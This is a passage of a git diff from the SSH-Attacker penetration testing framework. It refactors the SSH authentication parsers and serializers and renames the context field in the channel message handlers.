b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java index 9c370f8cb..a8c364eaf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java @@ -36,19 +36,21 @@ public UserAuthPubkeyMessageParser(InputStream stream) { super(stream); } - @Override - protected UserAuthPubkeyMessage createMessage() { - return new UserAuthPubkeyMessage(); - } + /* + @Override + protected UserAuthPubkeyMessage createMessage() { + return new UserAuthPubkeyMessage(); + } + */ @Override public void parse(UserAuthPubkeyMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } - private void parsePubkey() { + private void parsePubkey(UserAuthPubkeyMessage message) { message.setPubkeyLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Pubkey length: " + message.getPubkeyLength().getValue()); message.setPubkey(parseByteArrayField(message.getPubkeyLength().getValue())); @@ -56,7 +58,7 @@ private void parsePubkey() { "Pubkey: {}", ArrayConverter.bytesToRawHexString(message.getPubkey().getValue())); } - private void parsePubkeyAlgName() { + private void parsePubkeyAlgName(UserAuthPubkeyMessage message) { message.setPubkeyAlgNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "Pubkey algorithm name length: " + message.getPubkeyAlgNameLength().getValue()); @@ -68,12 +70,12 @@ private void parsePubkeyAlgName() { backslashEscapeString(message.getPubkeyAlgName().getValue())); } - private void parseUseSignature() { + private void parseUseSignature(UserAuthPubkeyMessage message) { message.setUseSignature(parseByteField(1)); LOGGER.debug("Use signature: " + message.getUseSignature().getValue()); } - private void parseSignature() { + private void parseSignature(UserAuthPubkeyMessage message) { message.setSignatureLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -83,13 +85,13 @@ private void parseSignature() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseUseSignature(); - parsePubkeyAlgName(); - parsePubkey(); + protected void parseMessageSpecificContents(UserAuthPubkeyMessage message) { + super.parseMessageSpecificContents(message); + parseUseSignature(message); + parsePubkeyAlgName(message); + parsePubkey(message); if (Converter.byteToBoolean(message.getUseSignature().getValue())) { - parseSignature(); + parseSignature(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthRequestMessageParser.java index 0779138ac..de8468d3a 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthRequestMessageParser.java @@ -33,7 +33,7 @@ public UserAuthRequestMessageParser(InputStream stream) { super(stream); } - private void parseUserName() { + private void parseUserName(T message) { message.setUserNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Username length: " + message.getUserNameLength().getValue()); message.setUserName( @@ -41,7 +41,7 @@ private void parseUserName() { LOGGER.debug("Username: {}", backslashEscapeString(message.getUserName().getValue())); } - private void parseServiceName() { + private void parseServiceName(T message) { message.setServiceNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Servicename length: " + message.getServiceNameLength().getValue()); message.setServiceName( @@ -50,7 +50,7 @@ private void parseServiceName() { LOGGER.debug("Servicename: {}", backslashEscapeString(message.getServiceName().getValue())); } - private void parseMethodName() { + private void parseMethodName(T message) { message.setMethodNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Methodname length: " + message.getMethodNameLength().getValue()); message.setMethodName( @@ -60,9 +60,9 @@ private void parseMethodName() { } @Override - protected void parseMessageSpecificContents() { - parseUserName(); - parseServiceName(); - parseMethodName(); + protected void parseMessageSpecificContents(T message) { + parseUserName(message); + parseServiceName(message); + parseMethodName(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java index d857b937a..5799e26a9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java @@ -30,18 +30,20 @@ public UserAuthSuccessMessageParser(InputStream stream) { super(stream); } - @Override - public UserAuthSuccessMessage createMessage() { - return new UserAuthSuccessMessage(); - } + /* + @Override + public UserAuthSuccessMessage createMessage() { + return new UserAuthSuccessMessage(); + } + */ @Override public void parse(UserAuthSuccessMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } @Override - protected void parseMessageSpecificContents() {} + protected void parseMessageSpecificContents(UserAuthSuccessMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java index 9ae778a6b..0ed5dd2e0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java @@ -31,12 +31,14 @@ public UserAuthUnknownMessageParser(InputStream stream) { super(stream); } - @Override - public UserAuthUnknownMessage createMessage() { - return new UserAuthUnknownMessage(); - } + /* + @Override + public UserAuthUnknownMessage createMessage() { + return new UserAuthUnknownMessage(); + } + */ - private void parseMethodSpecificFields() { + private void parseMethodSpecificFields(UserAuthUnknownMessage message) { message.setMethodSpecificFields(parseByteArrayField(getBytesLeft())); LOGGER.debug( "Method Specific Fields: " @@ -47,13 +49,13 @@ private void parseMethodSpecificFields() { @Override public void parse(UserAuthUnknownMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(); + parseMessageSpecificContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseMethodSpecificFields(); + protected void parseMessageSpecificContents(UserAuthUnknownMessage message) { + super.parseMessageSpecificContents(message); + parseMethodSpecificFields(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java new file mode 100644 index 000000000..fc1b53bf0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.preparator; + +import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthenticationMessagePreparator + extends ProtocolMessagePreparator { + private static final Logger LOGGER = LogManager.getLogger(); + + private final AuthenticationMessage msg; + + public AuthenticationMessagePreparator(Chooser chooser, AuthenticationMessage message) { + super(chooser, message); + this.msg = message; + } + + @Override + protected void prepareProtocolMessageContents() { + LOGGER.debug("Preparing ApplicationMessage"); + prepareData(msg); + } + + private void prepareData(AuthenticationMessage msg) { + if (msg.getDataConfig() != null) { + msg.setData(msg.getDataConfig()); + } else { + msg.setData(chooser.getLastHandledAuthenticationMessageData()); + } + LOGGER.debug("Data: {}", msg.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java new file mode 100644 index 000000000..d4200f4c1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.authentication.serializer; + +import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthenticationMessageSerializer + extends ProtocolMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * Constructor for the ApplicationMessageSerializer + * + * @param message Message that should be serialized + */ + public AuthenticationMessageSerializer(AuthenticationMessage message) { + super(message); + } + + @Override + protected byte[] serializeBytes() { + LOGGER.debug("Serializing ApplicationMessage"); + writeData(); + return getAlreadySerialized(); + } + + /** Writes the data of the ApplicationMessage into the final byte[] */ + private void writeData() { + appendBytes(message.getData().getValue()); + LOGGER.debug("Data: {}", message.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java index b34ed8135..bcda44f54 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java @@ -44,4 +44,10 @@ public void serializeMessageSpecificContents() { serializeMessage(); serializeLanguageTag(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java index ef20d8b8b..7d8c9b0e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java @@ -49,4 +49,10 @@ public void serializeMessageSpecificContents() { serializePossibleAuthenticationMethods(); serializePartialSuccess(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java index 0a93b98f0..4a87161f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java @@ -75,4 +75,10 @@ public void serializeMessageSpecificContents() { serializeLanguageTag(); serializePrompt(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java index eb634ba10..08ebc5189 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java @@ -41,4 +41,10 @@ private void serializeResponse() { public void serializeMessageSpecificContents() { serializeResponse(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java index a94dc0b63..23e3350e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java @@ -54,4 +54,10 @@ public void serializeMessageSpecificContents() { serializeServiceName(); serializeMethodName(); } + + @Override + public byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java index 2c74846d0..36d1153b8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java @@ -18,4 +18,10 @@ public UserAuthSuccessMessageSerializer(UserAuthSuccessMessage message) { @Override public void serializeMessageSpecificContents() {} + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java index c5299ba9f..f51653003 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java @@ -11,6 +11,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bool.ModifiableBoolean; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.Message; import de.rub.nds.sshattacker.core.layer.context.SshContext; import jakarta.xml.bind.annotation.XmlAccessType; @@ -49,6 +50,17 @@ public abstract class ProtocolMessage> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) protected ModifiableByteArray completeResultingMessage; + public ProtocolMessageType getProtocolMessageType() { + return protocolMessageType; + } + + public void setProtocolMessageType(ProtocolMessageType protocolMessageType) { + this.protocolMessageType = protocolMessageType; + } + + /** content type */ + @XmlTransient protected ProtocolMessageType protocolMessageType; + public ProtocolMessage() {} public boolean isRequired() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java index 87141e3bb..68d489778 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageHandler.java @@ -17,14 +17,17 @@ public abstract class ProtocolMessageHandler protected static final Logger LOGGER = LogManager.getLogger(); - protected final SshContext context; + protected final SshContext sshContext; // protected final MessageT message; - public ProtocolMessageHandler(SshContext context) { - this.context = context; + public ProtocolMessageHandler(SshContext sshContext) { + this.sshContext = sshContext; } + // Kann von den detaillierten Handlern überschrieben werden. + public void adjustContextAfterSerialize(MessageT message) {} + /* public ProtocolMessageHandler(SshContext context, T message) { this.context = context; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java index b456ecb46..f636b26ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageParser.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.protocol.common; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; @@ -22,7 +21,7 @@ public abstract class ProtocolMessageParser> extend private static final Logger LOGGER = LogManager.getLogger(); - protected final T message = createMessage(); + // protected final T message = createMessage(); public ProtocolMessageParser(InputStream stream) { super(stream); @@ -43,17 +42,17 @@ public final T parse() { return message; }*/ - protected abstract T createMessage(); + // protected abstract T createMessage(); - protected abstract void parseProtocolMessageContents(); + // protected abstract void parseProtocolMessageContents(); - private void setCompleteResultingMessage() { + /*private void setCompleteResultingMessage() { message.setCompleteResultingMessage(getAlreadyParsed()); LOGGER.trace( "Complete message bytes parsed: " + ArrayConverter.bytesToHexString( message.getCompleteResultingMessage().getValue())); - } + }*/ /*public static ProtocolMessage delegateParsing(AbstractPacket packet, Context context) { byte[] raw = packet.getPayload().getValue(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java index 2b984e083..156d9a3e1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java @@ -17,11 +17,11 @@ public ProtocolMessageSerializer(T message) { this.message = message; } - @Override + /* @Override protected final byte[] serializeBytes() { serializeProtocolMessageContents(); return getAlreadySerialized(); - } + }*/ - protected abstract void serializeProtocolMessageContents(); + // protected abstract void serializeProtocolMessageContents(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 723c3ac22..43ee2a0c4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.protocol.common; -import de.rub.nds.sshattacker.core.constants.SshMessageConstants; import java.io.InputStream; public abstract class SshMessageParser> extends ProtocolMessageParser { @@ -24,15 +23,15 @@ public SshMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override protected final void parseProtocolMessageContents() { parseMessageID(); parseMessageSpecificContents(); - } + }*/ - private void parseMessageID() { + /* private void parseMessageID() { message.setMessageId(parseByteField(SshMessageConstants.MESSAGE_ID_LENGTH)); - } + }*/ - protected abstract void parseMessageSpecificContents(); + protected abstract void parseMessageSpecificContents(T message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java index 3d69d362d..f90775a8d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java @@ -14,7 +14,7 @@ public SshMessageSerializer(T message) { super(message); } - @Override + // @Override protected final void serializeProtocolMessageContents() { appendByte(message.getMessageId().getValue()); serializeMessageSpecificContents(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java index 71d730e49..be8b1f000 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java @@ -28,7 +28,7 @@ public ChannelCloseMessageHandler(SshContext context) { @Override public void adjustContext(ChannelCloseMessage message) { - Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); + Channel channel = sshContext.getChannels().get(message.getRecipientChannelId().getValue()); if (channel != null) { if (!channel.isOpen().getValue()) { LOGGER.warn( @@ -38,7 +38,7 @@ public void adjustContext(ChannelCloseMessage message) { } else { channel.setCloseMessageReceived(true); if (!channel.isOpen().getValue()) { - context.getChannels().remove(message.getRecipientChannelId().getValue()); + sshContext.getChannels().remove(message.getRecipientChannelId().getValue()); } } } else { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java index 17dce23a5..7b4ae5c03 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java @@ -30,15 +30,15 @@ public ChannelOpenConfirmationMessageHandler(SshContext context) { @Override public void adjustContext(ChannelOpenConfirmationMessage message) { - Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); + Channel channel = sshContext.getChannels().get(message.getRecipientChannelId().getValue()); if (channel == null) { LOGGER.warn( "{} received but no channel with id {} found locally, creating a new channel from defaults with given channel id.", this.getClass().getSimpleName(), message.getRecipientChannelId().getValue()); - channel = context.getConfig().getChannelDefaults().newChannelFromDefaults(); + channel = sshContext.getConfig().getChannelDefaults().newChannelFromDefaults(); channel.setLocalChannelId(message.getRecipientChannelId().getValue()); - context.getChannels().put(channel.getLocalChannelId().getValue(), channel); + sshContext.getChannels().put(channel.getLocalChannelId().getValue(), channel); } channel.setRemoteChannelId(message.getSenderChannelId()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java index 411c7f10f..84690d175 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java @@ -27,13 +27,13 @@ public ChannelOpenFailureMessageHandler(SshContext context) { @Override public void adjustContext(ChannelOpenFailureMessage message) { - if (!context.getChannels().containsKey(message.getRecipientChannelId().getValue())) { + if (!sshContext.getChannels().containsKey(message.getRecipientChannelId().getValue())) { LOGGER.warn( "{} received but no channel with id {} found locally, ignoring it.", this.getClass().getSimpleName(), message.getRecipientChannelId().getValue()); } - context.getChannels().remove(message.getRecipientChannelId().getValue()); + sshContext.getChannels().remove(message.getRecipientChannelId().getValue()); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java index 0ac4311eb..6e62a55e2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestAuthAgentMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestAuthAgentMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java index 745b5af7a..1dae4d666 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java @@ -46,7 +46,7 @@ public ChannelRequestBreakMessageSerializer getSerializer() { @Override public void adjustContext(ChannelRequestBreakMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java index 3c11e63e9..82b53e15c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java @@ -25,7 +25,7 @@ public ChannelRequestEnvMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestEnvMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java index e8989279e..87375461d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestExecMessageHandler(SshContext context) { public void adjustContext(ChannelRequestExecMessage message) { // TODO: Handle ChannelRequestExecMessage if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java index f17d269d0..349dbaf66 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestExitSignalMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestExitSignalMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java index 9ff8adc05..2f8ffb2aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java @@ -47,7 +47,7 @@ public ChannelRequestExitStatusMessageSerializer getSerializer() { @Override public void adjustContext(ChannelRequestExitStatusMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java index 4d1366055..1fe66721c 100644 --- 